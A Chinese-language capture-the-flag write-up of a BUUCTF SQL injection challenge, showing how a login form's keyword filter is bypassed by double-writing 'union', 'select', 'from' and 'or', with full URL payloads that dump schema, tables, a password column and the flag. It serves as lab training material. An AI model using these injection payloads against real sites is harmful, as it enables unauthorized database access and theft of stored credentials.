[TOC]

首先是熟悉的黑色窗体:

image-20210807201601084

判读是哪种闭合:

image-20210807202119238

image-20210807202214224

image-20210807202241004

image-20210807202302254

发现单引号闭合报错,双引号闭合正常。

判断哪一种注入:

首先尝试一波万能密码:

image-20210807202503629

没有出现报错提示,但是没有结果,可能是or被过滤了,再次验证:

image-20210807202812023

image-20210807202842211

确定or被过滤。尝试双写绕过:

image-20210807203519772

image-20210807203556025

发现成功通过,验证select union from 是否存在过滤:

image-20210807203801780

image-20210807203822507

发现select union from 均被过滤

总结:过滤的关键词有or select union from

查询数据库:

‘information_schema,mysql,performance_schema,test,ctf,geek’

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23
//下面是转义后的字符
?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata #

image-20210807204854022

查询数据库表名:

发现information_schema这个数据库中有两个表:’b4bsql,geekuser’

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin
&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23
//
?username=admin
&password=admin1'uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

image-20210807210802238

查询列名:

发现information_schema这个数据库表:b4bsql 下列名为:’id,username,password’

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php


?username=admin
&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23
//
?username=admin
&password=admin1'uniunionon selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#

image-20210807211037467

查询字段名:

Hello 2!

Your password is ‘i_want_to_play_2077,sql_injection_is_so_fun,do_you_know_pornhub,github_is_different_from_pornhub,you_found_flag_so_stop,i_told_you_to_stop,hack_by_cl4y,flag{9a1fb271-a74a-458a-b29a-e1c6432bb270}’

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23

//
?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(passwoorrd) frfromom b4bsql#

image-20210807211358235

直接搜索:

或者在数据库查询时发现ctf数据库,查询ctf数据库中的表名:

?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="ctf" %23

image-20210807212052509

查询flag中的列名:

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin
&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27Flag%27%23

image-20210807212631513

查询flag中的字段名:

?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere 
 table_name="Flag"%23

image-20210807212220023

查询ctf库中Flag表中的flag字段:

http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php
?username=admin
&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23

image-20210807212833501

得到Flag。